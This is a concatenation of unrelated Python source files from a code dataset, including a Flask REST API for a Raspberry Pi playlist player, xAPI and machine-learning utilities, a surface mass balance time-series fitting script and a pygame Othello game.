            except subprocess.CalledProcessError as e:
                logger.error('Error Occurred during execution of StartVideoPlaylist:\n{}'.format(e))
                return gen_response(STATUS_CODES['PlayError'], 'Ooops! Something\'s Wrong')
        return gen_response(STATUS_CODES['PlayError'], 'Yikes! No Such Playlist!')
    def pause_playlist(self, **kwargs):
        # NOTE(review): not implemented — logged so the gap is visible.
        logger.warning("[pause_playlist] Not Implemented function.")
        return gen_response(STATUS_CODES['PauseError'], 'Oops! Not Implemented yet')
    def stop_playlist(self, **kwargs):
        # Fire-and-forget Popen: the script's exit status is never checked.
        try:
            subprocess.Popen(['bash', '{}/stopfpp.sh'.format(SCRIPTS_DIR)])
            return gen_response(STATUS_CODES['Success'], 'Stopped Playlist')
        except Exception as e:
            logger.error('Error Occurred during execution of stopfpp:\n{}'.format(e))
            return gen_response(STATUS_CODES['StopError'], 'Ooops! Something\'s Wrong')
class System(Resource):
    """REST resource for system-level actions: reboot, shutdown, WiFi SSID management."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.parser = reqparse.RequestParser()
        self.parser.add_argument('wifi_ssid')
        # GET dispatch table; POST is handled separately (SSID update only).
        self.actions = {
            'reboot': self.reboot,
            'shutdown': self.shutdown,
            'check_ssid': self.check_ssid,
        }
        # NOTE(review): `list('update_ssid')` expands to the string's
        # characters, not the word — presumably meant ['update_ssid']; confirm.
        self.default = lambda: gen_response(STATUS_CODES['Success'], list(self.actions.keys()) + list('update_ssid'))
    def get(self, action):
        return self.actions.get(action, self.default)()
    def post(self, action):
        """POST /<action> — only SSID updates; validates then delegates to update_ssid."""
        args = self.parser.parse_args()
        wifi_ssid = args.get('wifi_ssid', '')
        if not wifi_ssid:
            return gen_response(STATUS_CODES['SSIDUpdateError'], 'WiFi SSID can\'t be null.\nPlease provide a valid WiFi SSID.')
        elif not str(wifi_ssid).isalnum():
            return gen_response(STATUS_CODES['SSIDUpdateError'], 'Only alphanumeric characters are allowed.\nPlease provide a valid WiFi SSID.')
        return self.update_ssid(wifi_ssid)
    def reboot(self):
        # Fire-and-forget: the script delays the reboot so the response can be sent.
        try:
            subprocess.Popen(['bash', '{}/reboot.sh'.format(SCRIPTS_DIR)])
            return gen_response(STATUS_CODES['Success'], 'Rebooting Pi in 10 secs!')
        except Exception as e:
            logger.error('Error Occurred while Rebooting:\n{}'.format(e))
            return gen_response(STATUS_CODES['RebootError'], 'Ooops! Something\'s Wrong')
    def shutdown(self):
        try:
            subprocess.Popen(['bash', '{}/shutdown.sh'.format(SCRIPTS_DIR)])
            return gen_response(STATUS_CODES['Success'], 'Shutting down Pi in 10 secs!')
        except Exception as e:
            logger.error('Error Occurred while Shutting down:\n{}'.format(e))
            return gen_response(STATUS_CODES['ShutdownError'], 'Ooops! Something\'s Wrong')
    def check_ssid(self):
        # check_ssid.sh prints a flag; a '1' anywhere in its output means the
        # SSID was already updated.
        try:
            ssid_status = str(subprocess.check_output(['bash', '{}/check_ssid.sh'.format(SCRIPTS_DIR)]))
            if '1' in ssid_status:
                return gen_response(STATUS_CODES['SSIDUpdated'], 'WiFi SSID is already Updated.\nNote: You can only update once.')
            else:
                return gen_response(STATUS_CODES['SSIDNotUpdated'], 'WiFi SSID not updated! Please update WiFi SSID.')
        except subprocess.CalledProcessError as e:
            logger.error('Error Occurred while Checking for wifi ssid:\n{}'.format(e))
            return gen_response(STATUS_CODES['SSIDCheckError'], 'Ooops! Something\'s Wrong')
    def update_ssid(self, wifi_ssid):
        # wifi_ssid has already been validated as non-empty and alphanumeric in post().
        try:
            subprocess.check_call(['bash', '{}/update_ssid.sh'.format(SCRIPTS_DIR), wifi_ssid])
            logger.info('WiFi SSID Updated to {}'.format(wifi_ssid))
            return gen_response(STATUS_CODES['Success'], 'WiFi SSID is Updated! System will now reboot.')
        except subprocess.CalledProcessError as e:
            logger.error('Error Occurred while Updating WiFi SSID:\n')
            logger.error(e)
            return gen_response(STATUS_CODES['SSIDUpdateError'], 'Ooops! Something\'s Wrong')
##
## Actually setup the Api resource routing here
##
# '/' lists actions, '/<action>' handles system-level actions,
# '/<action>/<playlist>' handles playlist actions (two path segments).
FPPApi.add_resource(Info, '/')
FPPApi.add_resource(System, '/<action>')
FPPApi.add_resource(Playlist, '/<action>/<playlist>')
if __name__ == "__main__":
FPPApp.secret_key = '<KEY>'
from gevent.wsgi import WSGIServer
address = ("0.0.0.0", 2017)
server = WSGIServer(address, FPPApp,
log=logger, error_log=logger)
try:
logger.info("Server running on port %s:%d. Ctrl+C to quit" % address)
server.serve_forever()
except KeyboardInterrupt:
server.stop()
logger.info("Bye bye")
| StarcoderdataPython |
4822133 | """
IO-Tools
--------
Tools for input and output.
"""
from pathlib import Path
from datetime import datetime
from typing import Iterable
from generic_parser.entry_datatypes import get_instance_faker_meta
from generic_parser.entrypoint_parser import save_options_to_config
from pylhc_submitter.constants.general import TIME
# Output -----------------------------------------------------------------------
def save_config(output_dir: Path, opt: dict, script: str):
    """
    Quick wrapper for ``save_options_to_config``.

    Args:
        output_dir (Path): Path to the output directory (does not need to exist).
        opt (dict): opt-structure to be saved.
        script (str): path/name of the invoking script (becomes name of the .ini)
                      usually ``__file__``.
    """
    output_dir.mkdir(parents=True, exist_ok=True)
    # Stringify Paths first, then escape '%(' so configparser interpolation is safe.
    cleaned = escape_percentage_signs(convert_paths_in_dict_to_strings(opt))
    timestamp = datetime.utcnow().strftime(TIME)
    ini_file = output_dir / f"{script:s}_{timestamp:s}.ini"
    save_options_to_config(ini_file, dict(sorted(cleaned.items())))
def escape_percentage_signs(dict_: dict) -> dict:
    """Escape '%(' as '%%(' in all string values, recursing into nested dicts.

    Mutates ``dict_`` in place and returns it; '%(' triggers interpolation in
    the config-parser, hence the escaping.
    """
    for key in dict_:
        entry = dict_[key]
        if isinstance(entry, dict):
            dict_[key] = escape_percentage_signs(entry)
        elif isinstance(entry, str):
            dict_[key] = entry.replace("%(", "%%(")
    return dict_
def convert_paths_in_dict_to_strings(dict_: dict) -> dict:
    """Return a shallow copy of ``dict_`` with every Path converted to str.

    Paths found inside iterable values are also converted; such an iterable is
    replaced by a (new) list only when it actually contained a Path.
    """
    result = dict_.copy()
    for key, value in result.items():
        if isinstance(value, Path):
            result[key] = str(value)
            continue
        try:
            as_list = list(value)
        except TypeError:
            continue  # not iterable -> leave untouched
        if any(isinstance(item, Path) for item in as_list):
            result[key] = [str(item) if isinstance(item, Path) else item
                           for item in as_list]
    return result
# Input ------------------------------------------------------------------------
class PathOrStr(metaclass=get_instance_faker_meta(Path, str)):
    """A class that behaves like a Path when possible, otherwise like a string."""
    def __new__(cls, value):
        # None passes through so optional arguments stay optional.
        if value is None:
            return None
        if isinstance(value, str):
            value = value.strip("\'\"")  # behavior like dict-parser, IMPORTANT FOR EVERY STRING-FAKER
        return Path(value)
def make_replace_entries_iterable(replace_dict: dict) -> dict:
    """Wrap every scalar (and every string) value of ``replace_dict`` in a list.

    Mutates in place and returns the same dict; already-iterable non-string
    values are left untouched.
    """
    for key, value in replace_dict.items():
        needs_wrapping = isinstance(value, str) or not isinstance(value, Iterable)
        if needs_wrapping:
            replace_dict[key] = [value]
    return replace_dict
def keys_to_path(dict_, *keys):
    """Convert the values at ``keys`` to Path in place (None stays None)."""
    for key in keys:
        if dict_[key] is not None:
            dict_[key] = Path(dict_[key])
    return dict_
| StarcoderdataPython |
1686273 | <filename>tincan/activity.py
# Copyright 2014 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tincan.serializable_base import SerializableBase
from tincan.statement_targetable import StatementTargetable
from tincan.activity_definition import ActivityDefinition
"""
.. module:: activity
:synopsis: The Activity object that defines the boundaries on the 'Object' \
part of 'Actor-Verb-Object' structure of a Statement
"""
class Activity(SerializableBase, StatementTargetable):
    """xAPI Activity: the 'Object' part of the 'Actor-Verb-Object' Statement."""
    # Required properties (serialized even when unset).
    _props_req = [
        'id',
        'object_type'
    ]
    # Optional properties; _props ends up as the full property list.
    _props = [
        'definition',
    ]
    _props.extend(_props_req)
    def __init__(self, *args, **kwargs):
        # Pre-seed backing fields so property setters can run from the base ctor.
        self._id = None
        self._object_type = None
        self._definition = None
        super(Activity, self).__init__(*args, **kwargs)
    @property
    def id(self):
        """Id for Activity

        :setter: Sets the id
        :setter type: unicode
        :rtype: unicode
        """
        return self._id
    @id.setter
    def id(self, value):
        if value is not None:
            if value == '':
                raise ValueError(
                    "Property 'id' in 'tincan.%s' object must be not empty."
                    % self.__class__.__name__)
        # NOTE: uses the Python 2 ``unicode`` builtin -- this module is Py2-only.
        self._id = None if value is None else unicode(value)
    @property
    def object_type(self):
        """Object type for Activity. Will always be "Activity"

        :setter: Tries to convert to unicode
        :setter type: unicode
        :rtype: unicode
        """
        return self._object_type
    @object_type.setter
    def object_type(self, _):
        # The argument is deliberately ignored: object_type is fixed.
        self._object_type = 'Activity'
    @property
    def definition(self):
        """Definition for Activity

        :setter: Tries to convert to :class:`tincan.ActivityDefinition`
        :setter type: :class:`tincan.ActivityDefinition`
        :rtype: :class:`tincan.ActivityDefinition`
        """
        return self._definition
    @definition.setter
    def definition(self, value):
        # Coerce plain dicts (or similar) into an ActivityDefinition.
        if value is not None and not isinstance(value, ActivityDefinition):
            value = ActivityDefinition(value)
        self._definition = value
    @definition.deleter
    def definition(self):
        del self._definition
| StarcoderdataPython |
3311537 | <filename>allencv/tests/predictors/object_detection/region_proposal_network.py
from allencv.common.testing import AllenCvTestCase
from allencv.data.dataset_readers import ImageAnnotationReader
from allencv.predictors import ImagePredictor
from allencv.models.object_detection import RPN
from allencv.modules.image_encoders import ResnetEncoder, FPN
class TestRegionProposalNetwork(AllenCvTestCase):
    """End-to-end smoke test: build an FPN-backed RPN and run the image predictor."""
    def test_predictor(self):
        """Predicted proposals on a fixture image should all be 4-element boxes."""
        backbone = ResnetEncoder('resnet18')
        fpn_out_channels = 256
        fpn_backbone = FPN(backbone, fpn_out_channels)
        # One anchor-size / aspect-ratio set per FPN pyramid level (5 levels).
        anchor_sizes = [[32], [64], [128], [256], [512]]
        anchor_aspect_ratios = [[0.5, 1.0, 2.0], [0.5, 1.0, 2.0], [0.5, 1.0, 2.0],
                                [0.5, 1.0, 2.0], [0.5, 1.0, 2.0]]
        fpn_post_nms_top_n = 400
        rpn = RPN(fpn_backbone,
                  anchor_sizes=anchor_sizes,
                  anchor_aspect_ratios=anchor_aspect_ratios,
                  fpn_post_nms_top_n=fpn_post_nms_top_n)
        reader = ImageAnnotationReader()
        predictor = ImagePredictor(rpn, reader)
        predicted = predictor.predict(AllenCvTestCase.FIXTURES_ROOT / "data" / "image_annotation" / "images" / "00001.jpg")
        # Every proposal is an (x1, y1, x2, y2) box.
        assert all([len(x) == 4 for x in predicted['proposals']])
| StarcoderdataPython |
3394992 | """
Cannned responses for glance images
"""
from __future__ import absolute_import, division, unicode_literals
from mimic.canned_responses.json.glance.glance_images_json import (images,
image_schema)
def get_images():
    """
    Canned response for glance images list call
    """
    # Static fixture imported from glance_images_json; no filtering/pagination.
    return images
def get_image_schema():
    """
    Canned response for GET glance image schema API call
    """
    # Static fixture imported from glance_images_json.
    return image_schema
| StarcoderdataPython |
4810405 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Fit annual var in single catchment example
Created on Tue Apr 27 16:40:46 2021
@author: lizz
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import statsmodels.api as sm
from statsmodels.tsa.ar_model import AutoReg, ar_select_order
from matplotlib import cm
import glob
model_names = ['ANICE-ITM_Berends', 'CESM_kampenhout', 'dEBM_krebs','HIRHAM_mottram',
'NHM-SMAP_niwano', 'RACMO_noel', 'SNOWMODEL_liston']
## Read in time series
def read_catchment_series(fpath, anomaly=True):
    """Read a catchment SMB time series from CSV.

    Args:
        fpath: path to a CSV whose first column is a parseable date index.
        anomaly: if True, return the series minus its per-column mean.

    Returns:
        pandas.DataFrame indexed by date, with fill values (> 1e30) masked
        to NaN.
    """
    catchment_fpath = fpath
    catchment_tseries = pd.read_csv(catchment_fpath, index_col=0, parse_dates=[0])
    # BUG FIX: DataFrame.mask is not in-place -- the original discarded the
    # result, so >1e30 fill values leaked into the mean and the anomaly.
    catchment_tseries = catchment_tseries.mask(catchment_tseries > 1e30)
    anomaly_series = catchment_tseries - catchment_tseries.mean()
    if anomaly:
        return anomaly_series
    else:
        return catchment_tseries
def fit_catchment_series(tseries, comparison_n=range(1,6), multi_model_mode=True,
                         strength_of_fit=False, seasonal=True):
    """Select an AR(n) order by BIC across all SMB models.

    Fits AutoReg(n) (constant + trend) for each candidate n and each model
    column, records the BIC, and returns the mode of the per-model
    BIC-minimising orders.

    NOTE(review): when ``multi_model_mode`` is False the function falls
    through and returns None, and ``strength_of_fit`` is accepted but never
    used -- confirm whether both are intentional.
    """
    bic_per_n = pd.DataFrame(index=comparison_n, columns=model_names)
    for n in comparison_n:
        for m in model_names:
            mod = AutoReg(tseries[m], n, trend='ct', seasonal=seasonal)
            results = mod.fit()
            bic_per_n[m][n] = results.bic
    if multi_model_mode:
        for m in model_names:
            bic_per_n[m] = pd.to_numeric(bic_per_n[m]) # needed for idxmin
        best_n = bic_per_n.idxmin().mode()[0]
        return best_n
# Fit the BIC-selected AR(n) to each model's annual series for one catchment
# (basin 101, Kangerlussuaq) and keep fitted values / residuals per model.
mod_fits = {m: [] for m in model_names}
mod_resids = {m: [] for m in model_names}
basin_i=101
# First matching per-catchment CSV produced by the SMBMIP processing step.
ctmt_fpath = glob.glob('/Users/lizz/Documents/GitHub/Data_unsynced/SMBMIP-processed/*-catchment_{}-tseries.csv'.format(basin_i))[0]
s = read_catchment_series(ctmt_fpath)
a = s.resample('A').sum()  # annual sums of the anomaly series
best_n = fit_catchment_series(a, seasonal=False)
for m in model_names:
    mod = AutoReg(a[m], best_n, trend='ct', seasonal=False).fit()
    fv = mod.fittedvalues
    r = mod.resid
    mod_fits[m] = fv
    mod_resids[m] = r
## Plot a single timeseries with AR(n) fit
# Shades of blue distinguish the SMB models; the NHM-SMAP series is shown
# together with its AR(n) fit (black diamonds).
colors_w = cm.get_cmap('Blues')(np.linspace(0.2, 1, num=len(model_names)))
fig2, ax2 = plt.subplots(figsize=(10,4))
for i,m in enumerate(model_names):
    if 'NHM' in m:
        ax2.plot(a[m], label=m, color=colors_w[i])
        ax2.plot(mod_fits[m], color='k', alpha=0.8, marker='d',
                 label='AR({}) fit to {}'.format(best_n, m))
    else:
        pass
ax2.set(xlabel='Year', ylabel='Catchment SMB [mm w.e.]',
        # title='Basin {}, all models'.format(basin_i)
        title='Kangerlussuaq catchment, SMB model and AR(n) fit',
        xticks=(np.datetime64('1980-01-01'), np.datetime64('1990-01-01'),
                np.datetime64('2000-01-01'), np.datetime64('2010-01-01')),
        xticklabels=(1980,1990,2000,2010)
        )
ax2.legend(bbox_to_anchor=(1.05, 1.0, 0.3, 0.2), loc='upper left')
plt.tight_layout()
plt.show()
# Second figure: all models (top panel) plus the NHM-SMAP fit (bottom panel).
fig3, (ax3, ax4) = plt.subplots(2, figsize=(10,6), sharex=True)
for i,m in enumerate(model_names):
    ax3.plot(a[m], label=m, color=colors_w[i])
    if 'NHM' in m:
        ax4.plot(a[m], label=m, color=colors_w[i])
        ax4.plot(mod_fits[m], color='k', alpha=0.8, marker='d',
                 label='AR({}) fit to {}'.format(best_n, m))
    else:
        pass
ax3.set(ylabel='Catchment SMB [mm w.e.]',
        title='Kangerlussuaq catchment, SMB models and AR(n) fit')
ax4.set(xlabel='Year', ylabel='Catchment SMB [mm w.e.]',
        # title='Basin {}, all models'.format(basin_i)
        # title='Kangerlussuaq catchment, SMB model and AR(n) fit',
        xticks=(np.datetime64('1980-01-01'), np.datetime64('1990-01-01'),
                np.datetime64('2000-01-01'), np.datetime64('2010-01-01')),
        xticklabels=(1980,1990,2000,2010)
        )
ax3.legend(bbox_to_anchor=(1.05, 1.0, 0.3, 0.2), loc='upper left')
ax4.legend(bbox_to_anchor=(1.05, 1.0, 0.3, 0.2), loc='upper left')
plt.tight_layout()
plt.show()
| StarcoderdataPython |
1609609 | <filename>tiny_video_nets/batch_norm.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Batch norm layer with optional relu activation function."""
import tensorflow.compat.v1 as tf # tf
BATCH_NORM_DECAY = 0.9
BATCH_NORM_EPSILON = 1e-5
def batch_norm_relu(inputs,
                    is_training,
                    relu=True,
                    init_zero=False,
                    bn_decay=BATCH_NORM_DECAY,
                    bn_epsilon=BATCH_NORM_EPSILON,
                    data_format='channels_first'):
  """Performs a batch normalization followed by a ReLU.

  Args:
    inputs: `Tensor` of shape `[batch, channels, ...]`.
    is_training: `bool` for whether the model is training.
    relu: `bool` if False, omits the ReLU operation.
    init_zero: `bool` if True, initializes scale parameter of batch
        normalization with 0 instead of 1 (default).
    bn_decay: `float` batch norm decay parameter to use.
    bn_epsilon: `float` batch norm epsilon parameter to use.
    data_format: `str` either "channels_first" for `[batch, channels, height,
        width]` or "channels_last for `[batch, height, width, channels]`.

  Returns:
    A normalized `Tensor` with the same `data_format`.
  """
  if init_zero:
    # Zero gamma makes a residual branch start as identity (common ResNet trick).
    gamma_initializer = tf.zeros_initializer()
  else:
    gamma_initializer = tf.ones_initializer()
  # NOTE(review): this assert makes the 'channels_first' branch below
  # unreachable, contradicting the docstring's claim of channels_first
  # support -- confirm whether that restriction is intentional.
  assert data_format == 'channels_last'
  if data_format == 'channels_first':
    axis = 1
  else:
    axis = -1
  inputs = tf.layers.batch_normalization(
      inputs=inputs,
      axis=axis,
      momentum=bn_decay,
      epsilon=bn_epsilon,
      center=True,
      scale=True,
      training=is_training,
      fused=True,
      gamma_initializer=gamma_initializer)
  if relu:
    inputs = tf.nn.relu(inputs)
  return inputs
| StarcoderdataPython |
3238161 | <reponame>fightTone/CSC-171-Othello-game<gh_stars>0
import pygame, sys, pygame.mixer, time, os
from pygame.locals import *
EMPTY = 0
BLACK = 1
WHITE = 2
INFINITY = 999999999
MAX = 0
MIN = 1
DEFAULT_LEVEL = 2
HUMAN = "human"
COMPUTER = "computer"
RANDOM = "random"
class Gui:
    """Pygame front end for Othello: option menus, board drawing, scores and mouse input."""
    def __init__(self):
        """Initialise pygame, the window, colours, board layout constants and sprites."""
        pygame.init()
        pygame.display.set_caption('Coolthello Game')
        bg = pygame.image.load('res/back.jpg')
        bg = pygame.transform.scale(bg, (720, 480))
        self.BLACK = (0, 0, 0)
        self.BACKGROUND = (112, 22, 27)
        self.WHITE = (255, 255, 255)
        self.BLUE = (0, 0, 255)
        self.GRAY = (160, 160, 160)
        self.SCREEN_SIZE = (640, 480)
        self.BOARD_POS = (100, 20)
        self.BOARD = (120, 40)
        self.BOARD_SIZE = 400
        self.SQUARE_SIZE = 50
        self.screen = pygame.display.set_mode(self.SCREEN_SIZE)
        self.BLACK_LAB_POS = (5, self.SCREEN_SIZE[1] / 4)
        self.WHITE_LAB_POS = (560, self.SCREEN_SIZE[1] / 4)
        self.scoreFont = pygame.font.SysFont("Garamond", 58, bold=True)
        self.board_img = pygame.image.load(os.path.join(
            "res", "board.bmp")).convert()
        self.black_img = pygame.image.load(os.path.join(
            "res", "preta.bmp")).convert()
        self.white_img = pygame.image.load(os.path.join(
            "res", "branca.bmp")).convert()
        self.tip_img = pygame.image.load(os.path.join("res",
                                                      "tip.bmp")).convert()
        self.clear_img = pygame.image.load(os.path.join("res",
                                                        "nada.bmp")).convert()
    def show_options(self):
        """Show the start menu; returns (player1, player2, level) once Start is clicked."""
        # default values
        player1 = HUMAN
        player2 = COMPUTER
        level = DEFAULT_LEVEL
        while True:
            bg = pygame.image.load('res/back.jpg')
            bg = pygame.transform.scale(bg, (720, 480))
            title_image = pygame.image.load('res/Othello.png')
            title_pos = title_image.get_rect(centerx=self.screen.get_width() / 2, centery=120)
            start_img = pygame.image.load('res/start.png')
            start_pos = start_img.get_rect(
                centerx=self.screen.get_width() / 2, centery=280)
            player1_txt = pygame.image.load('res/first-player.png')
            player1_pos = player1_txt.get_rect(
                centerx=self.screen.get_width() / 2, centery=320)
            player2_txt = pygame.image.load('res/second-player.png')
            player2_pos = player2_txt.get_rect(
                centerx=self.screen.get_width() / 2, centery=360)
            level_txt = pygame.image.load('res/computer-level.png')
            level_pos = level_txt.get_rect(
                centerx=self.screen.get_width() / 2, centery=400)
            self.screen.blit(bg, [0,0])
            self.screen.blit(title_image, title_pos)
            self.screen.blit(start_img, start_pos)
            self.screen.blit(player1_txt, player1_pos)
            self.screen.blit(player2_txt, player2_pos)
            self.screen.blit(level_txt, level_pos)
            for event in pygame.event.get():
                if event.type == QUIT:
                    sys.exit(0)
                elif event.type == MOUSEBUTTONDOWN:
                    (mouse_x, mouse_y) = pygame.mouse.get_pos()
                    if start_pos.collidepoint(mouse_x, mouse_y):
                        return (player1, player2, level)
                    elif player1_pos.collidepoint(mouse_x, mouse_y):
                        player1 = self.get_chosen_player()
                    elif player2_pos.collidepoint(mouse_x, mouse_y):
                        player2 = self.get_chosen_player()
                    elif level_pos.collidepoint(mouse_x, mouse_y):
                        level = self.get_chosen_level()
            pygame.display.flip()
    def show_winner(self, player_color):
        """Render the end screen for the given winner (WHITE, BLACK, or tie)."""
        bg = pygame.image.load('res/back.jpg')
        bg = pygame.transform.scale(bg, (720, 480))
        win_white = pygame.image.load('res/win-white.png')
        white_pos = win_white.get_rect(centerx=self.screen.get_width() / 2, centery=280)
        win_black = pygame.image.load('res/win-black.png')
        black_pos = win_black.get_rect(centerx=self.screen.get_width() / 2, centery=280)
        tie = pygame.image.load('res/its-a-tie.png')
        tie_pos = tie.get_rect(centerx=self.screen.get_width() / 2, centery=280)
        if player_color == WHITE:
            msg = pygame.image.load('res/win-white.png')
        elif player_color == BLACK:
            msg = pygame.image.load('res/win-black.png')
        else:
            msg = pygame.image.load('res/its-a-tie.png')
        self.screen.blit(bg, [0,0])
        self.screen.blit(
            msg, msg.get_rect(
                centerx=self.screen.get_width() / 2, centery=160))
        pygame.display.flip()
    def get_chosen_player(self):
        """Sub-menu: return HUMAN, COMPUTER or RANDOM for one player slot."""
        while True:
            bg = pygame.image.load('res/back.jpg')
            bg = pygame.transform.scale(bg, (720, 480))
            player_img = pygame.image.load('res/player.png')
            player_pos = player_img.get_rect(
                centerx=self.screen.get_width() / 2, centery=80)
            human_img = pygame.image.load('res/Human.png')
            human_pos = human_img.get_rect(
                centerx=self.screen.get_width() / 2, centery=180)
            random_txt = pygame.image.load('res/Random.png')
            random_pos = random_txt.get_rect(
                centerx=self.screen.get_width() / 2, centery=300)
            comp_txt = pygame.image.load('res/Computer.png')
            comp_pos = comp_txt.get_rect(
                centerx=self.screen.get_width() / 2, centery=420)
            self.screen.blit(bg, [0,0])
            self.screen.blit(player_img, player_pos)
            self.screen.blit(human_img, human_pos)
            self.screen.blit(comp_txt, comp_pos)
            self.screen.blit(random_txt, random_pos)
            for event in pygame.event.get():
                if event.type == QUIT:
                    sys.exit(0)
                elif event.type == MOUSEBUTTONDOWN:
                    (mouse_x, mouse_y) = pygame.mouse.get_pos()
                    if human_pos.collidepoint(mouse_x, mouse_y):
                        return HUMAN
                    elif comp_pos.collidepoint(mouse_x, mouse_y):
                        return COMPUTER
                    elif random_pos.collidepoint(mouse_x, mouse_y):
                        return RANDOM
            pygame.display.flip()
    def get_chosen_level(self):
        """Sub-menu: return the chosen computer difficulty (1, 2 or 3)."""
        while True:
            bg = pygame.image.load('res/back.jpg')
            bg = pygame.transform.scale(bg, (720, 480))
            title = pygame.image.load('res/choose-level.png')
            title_pos = title.get_rect(
                centerx=self.screen.get_width() / 2, centery=80)
            one_txt = pygame.image.load('res/level-one.png')
            one_pos = one_txt.get_rect(
                centerx=self.screen.get_width() / 2, centery=180)
            two_txt = pygame.image.load('res/level-two.png')
            two_pos = two_txt.get_rect(
                centerx=self.screen.get_width() / 2, centery=300)
            three_txt = pygame.image.load('res/level-three.png')
            three_pos = three_txt.get_rect(
                centerx=self.screen.get_width() / 2, centery=420)
            self.screen.blit(bg, [0,0])
            self.screen.blit(title, title_pos)
            self.screen.blit(one_txt, one_pos)
            self.screen.blit(two_txt, two_pos)
            self.screen.blit(three_txt, three_pos)
            for event in pygame.event.get():
                if event.type == QUIT:
                    sys.exit(0)
                elif event.type == MOUSEBUTTONDOWN:
                    (mouse_x, mouse_y) = pygame.mouse.get_pos()
                    if one_pos.collidepoint(mouse_x, mouse_y):
                        return 1
                    elif two_pos.collidepoint(mouse_x, mouse_y):
                        return 2
                    elif three_pos.collidepoint(mouse_x, mouse_y):
                        return 3
            pygame.display.flip()
            time.sleep(.05)
    def show_game(self):
        """Draw the empty board with the four standard starting stones."""
        bg = pygame.image.load('res/back.jpg')
        bg = pygame.transform.scale(bg, (720, 480))
        self.background = pygame.Surface(self.screen.get_size()).convert()
        self.background.fill(self.BACKGROUND)
        self.score_size = 50
        self.score1 = pygame.Surface((self.score_size, self.score_size))
        self.score2 = pygame.Surface((self.score_size, self.score_size))
        self.screen.blit(self.background, (0, 0), self.background.get_rect())
        self.screen.blit(self.board_img, self.BOARD_POS,
                         self.board_img.get_rect())
        self.put_stone((3, 3), WHITE)
        self.put_stone((4, 4), WHITE)
        self.put_stone((3, 4), BLACK)
        self.put_stone((4, 3), BLACK)
        pygame.display.flip()
    def put_stone(self, pos, color):
        """Blit a stone (or a move tip, for any other color value) at board cell ``pos``."""
        if pos == None:
            return
        # Board coordinates are (row, col); swap for pixel (x, y) math.
        pos = (pos[1], pos[0])
        if color == BLACK:
            img = self.black_img
        elif color == WHITE:
            img = self.white_img
        else:
            img = self.tip_img
        x = pos[0] * self.SQUARE_SIZE + self.BOARD[0]
        y = pos[1] * self.SQUARE_SIZE + self.BOARD[1]
        self.screen.blit(img, (x, y), img.get_rect())
        pygame.display.flip()
    def clear_square(self, pos):
        """Blit the empty-square sprite over board cell ``pos``."""
        pos = (pos[1], pos[0])
        x = pos[0] * self.SQUARE_SIZE + self.BOARD[0]
        y = pos[1] * self.SQUARE_SIZE + self.BOARD[1]
        self.screen.blit(self.clear_img, (x, y), self.clear_img.get_rect())
        pygame.display.flip()
    def get_mouse_input(self):
        """Block until the user clicks inside the board; return the (row, col) cell."""
        while True:
            for event in pygame.event.get():
                if event.type == MOUSEBUTTONDOWN:
                    (mouse_x, mouse_y) = pygame.mouse.get_pos()
                    # Ignore clicks outside the board rectangle.
                    if mouse_x > self.BOARD_SIZE + self.BOARD[0] or \
                       mouse_x < self.BOARD[0] or \
                       mouse_y > self.BOARD_SIZE + self.BOARD[1] or \
                       mouse_y < self.BOARD[1]:
                        continue
                    position = ((mouse_x - self.BOARD[0]) // self.SQUARE_SIZE), \
                               ((mouse_y - self.BOARD[1]) // self.SQUARE_SIZE)
                    position = (position[1], position[0])
                    return position
                elif event.type == QUIT:
                    sys.exit(0)
            time.sleep(.05)
    def update(self, board, blacks, whites, current_player_color):
        """Redraw all stones from ``board`` (8x8, 0 = empty) and refresh the scores."""
        for i in range(8):
            for j in range(8):
                if board[i][j] != 0:
                    self.put_stone((i, j), board[i][j])
        blacks_str = ' '+ '%02d ' % int(blacks)
        whites_str = '%02d ' % int(whites)
        self.showScore(blacks_str, whites_str, current_player_color)
        pygame.display.flip()
    def showScore(self, blackStr, whiteStr, current_player_color):
        """Render both score labels; the side NOT to move gets a gray background."""
        black_background = self.GRAY if current_player_color == WHITE else self.BACKGROUND
        white_background = self.GRAY if current_player_color == BLACK else self.BACKGROUND
        text = self.scoreFont.render(blackStr, True, self.BLACK,
                                     black_background)
        text2 = self.scoreFont.render(whiteStr, True, self.WHITE,
                                      white_background)
        self.screen.blit(text,
                         (self.BLACK_LAB_POS[0], self.BLACK_LAB_POS[1] + 40))
        self.screen.blit(text2,
                         (self.WHITE_LAB_POS[0], self.WHITE_LAB_POS[1] + 40))
    def wait_quit(self):
        """Drain one event batch: exit on QUIT, return on any key press."""
        for event in pygame.event.get():
            if event.type == QUIT:
                sys.exit(0)
            elif event.type == KEYDOWN:
                break
| StarcoderdataPython |
1672355 | """
Binary field is an interface used by binary structs.
Each field in binary structs must implement:
- serialization
- deserialization
- size property
Binary field is an interface for such these things.
PrimitiveTypeField is a primitive-ctypes based field,
and this file adds the classic primitive types that
implement BinaryField interface
"""
import sys
import struct
import ctypes
from enum import Enum
from abc import abstractmethod
class Endianness(Enum):
NONE = ''
BIG = 'be'
LITTLE = 'le'
HOST = LITTLE if sys.byteorder == 'little' else BIG
class BinaryField:
    """
    Interface implemented by every member of a binary_struct:
    serialization, deserialization and a size property, plus byte-wise
    bitwise operators over the serialized form.

    NOTE: You shouldn't use this interface in your classes,
    instead, use the binary_struct decorator
    """
    @abstractmethod
    def deserialize(self, buffer):
        pass
    @abstractmethod
    def __bytes__(self) -> bytes:
        pass
    @abstractmethod
    def __eq__(self, other) -> bool:
        pass
    @abstractmethod
    def __str__(self) -> str:
        pass
    @property
    @abstractmethod
    def size_in_bytes(self):
        pass
    @staticmethod
    def __bitwise_operation(op1, op2, operation) -> bytes:
